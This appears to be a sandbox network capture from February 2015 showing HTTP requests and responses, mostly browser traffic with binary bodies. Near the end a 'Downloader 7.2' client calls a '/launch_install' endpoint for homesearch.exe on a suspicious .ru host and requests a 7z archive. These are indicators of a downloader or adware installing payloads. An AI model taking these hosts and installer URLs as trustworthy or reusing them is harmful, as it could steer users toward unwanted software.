GET /live/red_lojson/300lo.json?9ho1q4&colc=1424684155231&si=54eaf47a338ecd7f&uid=54eaf47bdb0e5f32&pub=ra-4f75c7297cc8ab7f&rev=18.0-edge&jsl=1&ln=en&pc=men&vpc=&dp=go.mail.ru&fp=?osd=1&aa=0&of=0&uf=1&nt=cs;3,ce;51,dc;185,dclee;184,dcles;184,di;184,dl;105,dle;3,dls;2,fs;0,lee;u,les;185,ns;0,rs;51,rspe;180,rsps;98,scs;u&pd=0&irt=0&ct=1&tct=0&abt=0<=256&cdn=0&lnlc=us&whcs=1&tl=c=620,m=842,i=873,xm=1098,xp=1113&pi=1&&rb=0&gen=1000&gen=100&callback=_ate.track.hsr&mk=ÐŸÐ¾Ð¸ÑÐº,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð°Ñ ÑÐ¸ÑÑ‚ÐµÐ¼Ð°,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð°Ñ Ð¼Ð°ÑˆÐ¸Ð½Ð°,Ð¿Ð¾Ð¸ÑÐºÐ¾Ð²Ð¸Ðº,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ ÐºÐ°Ñ€Ñ‚Ð¸Ð½ÐºÐ°Ð¼,Ð¿Ð¾Ð¸ÑÐº Ð² Ð¸Ð½Ñ‚ÐµÑ€Ð½ÐµÑ‚Ðµ,Ð±ÐµÑÐ¿Ð»Ð°Ñ‚Ð½Ñ‹Ð¹ Ð¿Ð¾Ð¸ÑÐº,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ Ð²Ð¸Ð´ÐµÐ¾,Ð¿Ð¾Ð¸ÑÐº c Ñ€ÐµÐºÐ¾Ð¼ÐµÐ½Ð´Ð°Ñ†Ð¸ÑÐ¼Ð¸,Ð¿Ð¾Ð¸ÑÐº Ð¿Ð¾ Ð½Ð¾Ð²Ð¾ÑÑ‚ÑÐ¼,Ð¿Ð¾Ð¸ÑÐº Ð»ÑŽÐ´ÐµÐ¹.&uvs=54eaf47adf09bb20000&chr=UTF-8&md=0&vcl=0 HTTP/1.1

Host: m.addthis.com

Connection: k
HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:35:36 GMT

Cache-Control: max-age=0, no-cache, no-store

Pragma: no-cache

Set-Cookie: di2=NK7XBC.UYM;Path=/;Domain=.addthis.com;Expires=Wed, 22-Feb-2017 09:35:36 GMT

Set-Cookie: bt=;Path=/;Domain=.addthis.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT

Set-Cookie: dt=X;Path=/;Domain=.addthis.com;Expires=Wed, 25-Mar-2015 09:35:36 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"

Content-Type: application/javascript;charset=UTF-8

Content-Encoding: gzip

Connection: close
...........O,I. )JL...(...V*NM.M. )V....Q*-.........2J:J9. ...c....[XX
...].[..g...i...K..U......@Haf.....

GET /ru?utm_source=operadesktop&utm_medium=operaspeeddial&utm_campaign=operaspeeddial HTTP/1.1

Host: megogo.net

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:41 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Keep-Alive: timeout=25

Vary: Accept-Encoding

NGB: miev116prodnew

Access-Control-Allow-Origin: *

NGB: biev01prod

Content-Encoding: gzip
600a..............{s.../..U.|.6..H.a....,.2.g..8.M..w*N.@.I"....R.&...
z.$K..9.u.Hv2.S5.s@..A...t...8. .$w..Z...4...>......{.......[W,..r.
............e-..c..w..Et......eMZ..e.AW..X$..9.u..3a....R.....x.......
tz.....;w.."s.l"q{h..<.....^.].....H|..@ru.r.R....'>.]..m{.....Q
....`...S.#.tS..OA.k........k?|.._....._..Jq....rR......%..TJh...a|..:
.@n...}....BQo,;..Ee....F.n.|?.O;......3`.....i...05..5..I.......=5`..
..E....s.......xg..o.k.e.3.rX..>.>.. .V.\)U. ..A.dU...R.\...*..V
u..nZ..J..Y9....R.Q...Q........O.*.....J..a....X4 .Yvn.DVVb..H:......w
..2.....=%...........P....:.*e..o..RFg..^N.kO'..tte..u_i...rd...g#I_..
D;a#...5...*..$.aE.p.j2zsx!.[N...s...5.2...a.....w...U7SNl....Q..P.Pg.
..r.Q...|U......a..X^...'F.....;..|..v5.EZ ..9......4.0I.$.d..{...`..R
.6.......J..QE.U...}._..V_N].S.....,@om...{.....f........v<w..F..~.
S........z.d....-..V.S.gH&z..(b#Q.PK......].:.......*(..T.@.|...u.Rd..
....z.....~..........f._.7..y'5.......@5.kF..1..R.v...uS.A>......j&
gt;....L.8.........../;O.;.l*.v..X4~.J:1.KgR...k).,./.eg1....;...ptyQ~
.......f..&c.6./..B.=.y..?.,...3.EY7$.....W.=T.l.....Kd...w3....V..r".
..E.i'...?...:......,.M.n............7.?n..91mO....=1>.......M.O.NI
u'....W.N.V_|..ovt............=..x...O'V..lz..Y..{...^.....5.._.nh|$&l
t;2.........T........ONtV..{..*..y_.......T7.~_........P%...oy>:.*.
.._}..~.~G-......O..hj]....b$.H...#....|x.u._...3..[]V...$.j.6........
...=........{....d?....S .3?.....=...7pk...n..p_.s.d2....R"..[M[53.w..
.*~...B..........k..]U .~Tk1..jE.r.z....-_...y.]..'.h<..nY#.w,.<<< skipped >>>

GET /favicon.ico?1502091338 HTTP/1.1

Host: megogo.net

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:41 GMT

Content-Type: image/x-icon

Content-Length: 5430

Connection: keep-alive

Keep-Alive: timeout=25

Last-Modified: Wed, 12 Nov 2014 13:13:12 GMT

ETag: "54635ce8-1536"

Expires: Thu, 31 Dec 2037 23:55:55 GMT

Cache-Control: max-age=315360000

NGB: aiev116prodnew

Accept-Ranges: bytes

NGB: miev116prodnew

Access-Control-Allow-Origin: *

NGB: biev01prod

............ .h...&...  .... .........(....... ..... .....@...........
........333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.33
3.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.
333.333.222.222.333.333.333.333.333.333.222.222.333.333.333.333.333.33
3.222.222.333.333.222.222.333.333.222.222.333.333.333.333.222.222.....
....222.111.222.222.111.222.........222.222.333.333.222.222.........22
2.111.XXX.XXX.111.222.........222.222.333.333.222.222.........111.444.
........444.111.........222.222.333.333.222.222.........111...........
......111.........222.222.333.333.222.222.........SSS.................
SSS.........222.222.333.333.222.222.................GGG.GGG...........
......222.222.333.333.222.222.................111.111.................
222.222.333.333.222.222.............333.111.111.333.............222.22
2.333.333.333.333.222.222.222.222.333.333.222.222.222.222.333.333.333.
333.333.333.222.222.222.333.333.333.333.222.222.222.333.333.333.333.33
3.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.
333.333.333.333.333.333.333.333.333.333.333.333.333...................
..............................................(... ...@..... .........
................333.333.333.333.333.333.333.333.333.333.333.333.333.33
3.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.
333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.33
3.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.
333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.333.33

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545155, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEEfSKbCvSoRrx+JDeFk3zmo= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=325996, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 04:07:20 GMT

Expires: Fri, 27 Feb 2015 04:07:20 GMT

Date: Mon, 23 Feb 2015 09:35:37 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0040720Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...G.)..J.k..CxY7.j....20150220040720Z....20150227040720Z0...*.H.....
........x........_......^. .o...:....Hm.<{gt...|%..].5.....R..4s.8.
.u........x....V.....n.:....5..._....B(^..,.). ..........[...I..*..Z.]
....v....g*M9......n......4..._n...0~.,=..-L'h....[MCI.:B...eZ.....c..
...4k.w.SL.......2{}/...s..:.....st....s`.n...t..0Z..M..h....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Accept-Encoding: gzip, deflate

Host: 6.bezsms.org

DNT: 1

Connection: Keep-Alive


HTTP/1.1 404 Not Found

Server: nginx/1.0.15

Date: Mon, 23 Feb 2015 09:27:52 GMT

Content-Type: text/html; charset=iso-8859-1

Connection: keep-alive

Content-Length: 317
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>404 Not Found</title>.</head><
body>.<h1>Not Found</h1>.<p>The requested URL /fi
les/5/c86zwe6s7h00f6/Knig18679_Xim2.zip was not found on this server.&
lt;/p>.<hr>.<address>Apache/2.2.15 (CentOS) Server at 6
.bezsms.org Port 80</address>.</body></html>.HTTP/1.
1 404 Not Found..Server: nginx/1.0.15..Date: Mon, 23 Feb 2015 09:27:52
 GMT..Content-Type: text/html; charset=iso-8859-1..Connection: keep-al
ive..Content-Length: 317..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 
2.0//EN">.<html><head>.<title>404 Not Found</t
itle>.</head><body>.<h1>Not Found</h1>.<
p>The requested URL /files/5/c86zwe6s7h00f6/Knig18679_Xim2.zip was 
not found on this server.</p>.<hr>.<address>Apache/2
.2.15 (CentOS) Server at 6.bezsms.org Port 80</address>.</bod
y></html>...

GET /favicon.ico HTTP/1.1

Host: VVV.amazon.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:31:31 GMT

Server: Server

Last-Modified: Tue, 21 Sep 2010 17:37:41 GMT

ETag: "4486-490c87c5a6340-gzip"

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Content-Length: 2590

Content-Type: image/x-icon
...........ZMh]E...^.w.n..4...BH..\X....M.I.Z0u......2.IA.B.%o..D.V4i 
n.&DD1Q0]...jC...C...y....../.'.?8.....9...s..9..ae......UO2..c.......
....n...c.].......F.....=-..W.W.=...d..9...P....?<.r........'h.....
..z....S....... ..?p~U....._.....=.........zS...=g.....@.......j..j.f%
..U{F...$97;........... ..a.c..<i......,.$.'w.......B.!...J........
...\i{.3...?.....ox[p................-.9n....Lk..).g#9...?../....\.dKV
@..o.}.W.t...........W.n...o.-`.'z.....O9........mg.Cb..@.Sm.....V....
=._P..:..afh......{P..m.Z,.>`.@.....9WUZC.@.< m..B.....Bk.vs@_..
.......}..]..F...........O..G..J..I.l.....777..........V.k..l..c.O..F.
.=........}.....u..=...w..*.K.s..........|.............1~m2....y;}...n
p.\.2... ..dHB.>XKy.5.6....qu..................L..=Wj.,._.&..c....J
.Tn...._.1...uX..:....E.z......y].9>...C..q;.....!....oT..i1??.....
.H~...;.'..#...._,....-.y..p.@.'..m.....o1.. .#_...(.!^ .bT.........q.
o....j.6..!..%...b.......,........|.d..~L`M..@....Q1.'....../A.}.v....
.L....YE.~...z..}p....gr...a....?..q.{x..Mw2.Q.W&.W...............e..D
...?|....G...........7.......g.8?..j..s.......=h...EP5................
u...G... ..M5e....#.y..w%A..vNLNN..r....r..........P..0....7I..*.s.g..
F~....... <E.@....Z.Nu. ....d..X...b..X.....Z......s..;.>....%..
.z$....@.....H..q=AuZ...2.N..y...cJ.w..? 6.}$.e..........A...~.'\O.=#.
.....A.._............y|...5....T.=.f.w_.."7..I....s......jsT......E...
.E...t....Y....{..cW......KA.v.F....9.e....=.>E..4.....)..d........
F....E..z.r......C..........%.."..<9.X.1.bb.=...O....{.Ok......<<< skipped >>>

GET /?tag=operadesktop14-sd-us-20 HTTP/1.1

Host: VVV.amazon.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:31:38 GMT

Server: Server

Set-Cookie: skin=noskin; path=/; domain=.amazon.com

pragma: no-cache

x-amz-id-1: 1HN36CKVBA6GHZ2XEY2G

p3p: policyref="hXXp://VVV.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "

cache-control: no-cache

x-frame-options: SAMEORIGIN

expires: -1

x-amz-id-2: d2a4Y6OXAM31d/eL9XGCtRJ5/gorL7OB9eYdIB kjiKvHWEjEYCLZh74a8535xFi

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Content-Type: text/html; charset=UTF-8

Set-cookie: x-wl-uid=1tBUrzyjuKAuaEv4bLXA40G GJfr6ldZ8ZOXhQjfX2pa7gLR1x3gOB79u/dleIhpLrzy2vOOqAoA=; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT

Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT

Set-cookie: session-id=184-4217819-1111320; path=/; domain=.amazon.com; expires=Tue, 01-Jan-2036 08:00:01 GMT

Transfer-Encoding: chunked
ea6.............U.o.6......)........=uk..Z.N..t[.U...[0..$...}....Zm.P
d.7>......0.....7...v......S.&......7.e^].G...6.4!e.-..../M.&....l.
..p...@...2c......{rr....9.,H4b2.|.....;#.{k...$.,o.?.....&.....Q^...(
.}.7e$>5.%-D.L.|l).P.{2#..:........f]..$...D1....6._Q.5.4.....q....
...;.....g......v...e....ejbs.d.... .;:%.....4..7.`X..a.JR%2i.g.SPL..5
.j......Of..j..,...Bn .C..x..6.&....>.....8:.TU....65..q...1.I...*.
..ye"(.(I....*eR.......t...^.x...... ....BB..l*..^..&........-.(..U.u.
.-....k.....lbi...T.d..........x.../]0..e.R.{{!.. ..2'.p.)..60.....KV.
h .....<].4...........[...C$%:..'......T...)(D.BD...|;.N..B..H.B.l.
0$$...v.z...M...q4q...r.M...h_..A<.P...B!{..Q.&..Y.I6Q....e..m...!.
...d.._.n.n,D...`...X.FV.6.I0.# U..........V.`.9W@}...L]I.........]...
P....ea[D......Q#...X.'^. ...P...?.v...Q...$..L..<..3.^_}....*...WL
O.....J.J.....|....G......n.....9'.}....... ...2....{v.............W..
...GR..N.......xR...pJ2S".i..F.C..s.....@[.(.9V.\...s.e..h..GD.).?}.? 
2xeC.k....<\.m.....$.d-.D.....Z..L..b...{......R.r..xz..........zp.
.u.w.sX.....H..nw.0..L..=.a....A..09Q...n....3...j......../Q.".......E
b ).$E..l7.DR.J..........)..F.,.2...g...kS[...Q.WEe......_..;......0..
....Z...FS...P5...n.H./T.....gBo.-.,k.=..W.:..#M.VVJi..........z...G.`
3......Fc....<!8,WC.y....q..q&&..H.n.64b..tVW#.Y..v.G..'....w..2,.e
\.j&..... ..6.fSn...4I...a....}.<.......G(w....[^.X.............Z.]
.H..9...g..z..|...[..........M#J...y[...k.EX..<v\.......WO.H2....n.
.R..l}...X..3...jd@u.z..zS?O..mw.z1./~.3....rQ.q~j...i.7J...... .'<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545138, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /lego/_/qFyz_p77Mklm6G-g9tbfmp6arrk.ico HTTP/1.1

Host: yandex.st

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx/1.6.2

Date: Mon, 23 Feb 2015 09:35:38 GMT

Content-Type: image/x-icon

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Tue, 03 Feb 2015 15:55:07 GMT

ETag: W/"54d0ef5b-47e"

Expires: Thu, 31 Dec 2037 23:55:55 GMT

Cache-Control: max-age=315360000

Cache-Control: public

Access-Control-Allow-Origin: *

Content-Encoding: gzip
260..............]H.q...R.E.....C(.....j...-u.bZ.j.mE9....#..f.B2...s.
.eX8..L...5fE..b..(......._........s.s.....K.Oz:..zvr%ck.c....Y...m..E
..V..@D..@...,.H^.:.q1../...JP.....P..K.)..........4..4.....1t...z...Q
.....p...Y.*P.I;..i.c..<...v....U.>."..8..."......%...4.........
ZD...9....'..a...-.........U`K.......Z.^........"W..k5..#........z0..c
.I.<,...BL.8.w.A].......`>>/...........A..O..E......~.- ..Z..
O...3.P.3....^....q.w......i..KP=Q..[}.....Qq..%.&t...P..vf.>..H...
.......0...../."..6.....S.f.zk..3..N;1....xT......U.n...:N.....Gy....'
..zT..(H3.Y.#l.......T..Ay;}.FZP... ..R.C.I0...."V,....#.R.w...S..!~..
...0......

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ/xkCfyHfJr7GQ6M658NRZ4SHo/AQUCPVR6Pv+PT1kNnxoz1t4qN+5xTcCEGC2x6sSmevembHfY1acIZk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1697

content-transfer-encoding: binary

Cache-Control: max-age=580926, public, no-transform, must-revalidate

Last-Modified: Mon, 23 Feb 2015 02:58:16 GMT

Expires: Mon, 2 Mar 2015 02:58:16 GMT

Date: Mon, 23 Feb 2015 09:36:10 GMT

Connection: keep-alive
0..........0..... .....0......0...0...A0?1=0;..U...4VeriSign Class 3 C
ode Signing 2004 CA OCSP Responder..20150223025816Z0s0q0I0... ........
?.@..w.........Y.!......Q...==d6|h.[x....7..`..........cV.!.....201502
23025816Z....20150302025816Z0...*.H..............z~X...@..r.j2.x......
..a..'d..1$...l7...S.>n.%....|3....,/=H...N.o.G6i.......'j.....[@..
|<\...".~......|..w.T......u5^.F`.c..=l.....j.......3..}.."...l....
..EC$..}.."j#.?[Q..P8.....0. Ho`.JD.../.'....1'.-...h...Z.G.......?...
W {Z/.. ..G.....gs.....Y...rx5....0...0...0..{.........[..I|.....Zm..0
...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....Veri
Sign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/
rpa (c)041.0,..U...%VeriSign Class 3 Code Signing 2004 CA0...140428000
000Z..150729235959Z0?1=0;..U...4VeriSign Class 3 Code Signing 2004 CA 
OCSP Responder0.."0...*.H.............0.........Y....h..@..>.....%.
-.....O...' y.........x..Gw.xF.....?..Z..u,.X.&..........3C..H.l.....f
..;]s!.\"v...|....].@.....K7m2...N......-S.I......5n...G7. ..W....n..*
..-f?EY.......UN...r...........-_.%..,P;b.....)(.P.4...,.%....<..6.
....[r^X.EV..S...5#'Y.. .TD...........0...0...U.......0.0...U.%..0... 
.......0...U...........0... .....0......0f..U. ._0]0[..`.H...E....0L0#
.. .........hXXps://d.symcb.com/cps0%.. .......0...hXXps://d.symcb.com
/rpa0!..U....0...0.1.0...U....TGV-B-1080...U......"...?....`>q..i1o
...0...U.#..0.....Q...==d6|h.[x....70...*.H.............B8@.$..wo.....
.E.....P52"b*@'C\.y.(...n....h.f..7f.....v...pb<...]..|........<<< skipped >>>

GET /mapi?query={"cmd":"getCounters"}&callback=__PHJSONPCallback_0&rnd=1424684154318 HTTP/1.1

Host: ok.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Pragma: no-cache

Cache-Control: no-cache, no-store

Expires: Sat, 01 Jan 2000 00:00:00 GMT

Content-Type: application/x-javascript;charset=UTF-8

Transfer-Encoding: chunked

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Mon, 23 Feb 2015 09:35:34 GMT

a..............46...L.(.,H.OS.........pN..IJL..7...UO .K....S...@.Z..$
...X.J)/_!..$C.V.. ..e..@.....P.%.U.....0..HTTP/1.1 200 OK..Server: Ap
ache-Coyote/1.1..Pragma: no-cache..Cache-Control: no-cache, no-store..
Expires: Sat, 01 Jan 2000 00:00:00 GMT..Content-Type: application/x-ja
vascript;charset=UTF-8..Transfer-Encoding: chunked..Content-Encoding: 
gzip..Vary: Accept-Encoding..Date: Mon, 23 Feb 2015 09:35:34 GMT..a...
...........46...L.(.,H.OS.........pN..IJL..7...UO .K....S...@.Z..$...X
.J)/_!..$C.V.. ..e..@.....P.%.U.....0......

GET /launch_install?name=homesearch.exe?etag=bba9e197f9f68f6e3b7c53519e87cb75&hash=ff7d9019f9fb5697be04f7630fff268bf5dbad4a7293af5d273be3f397f08be4&md5=3d7b0f2a8aed2619867c64588bec38c2&stb=1&did=1497824015&ext_partner_id=&file_id=32888998&launch=bba9e197f9f68f6e3b7c53519e87cb75 HTTP/1.1

User-Agent: Downloader 7.2

Host: forces.prochristmasdom.ru

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:17 GMT

Content-Type: text/html

Content-Length: 0

Connection: close

X-Powered-By: PHP/5.4.37

Expires: Mon, 8 Oct 2012 01:02:03 GMT

Last-Modified: Mon, 23 Feb 2015 09:32:17 GMT

Cache-Control: no-cache, must-revalidate

Pragma: no-cache

HEAD /go_ffspt1.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Connection: close


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:32:18 GMT

Content-Type: application/x-7z-compressed

Content-Length: 4063118

Connection: close

Last-Modified: Wed, 17 Dec 2014 16:01:56 GMT

ETag: "5491a8f4-3dff8e"

Accept-Ranges: bytes

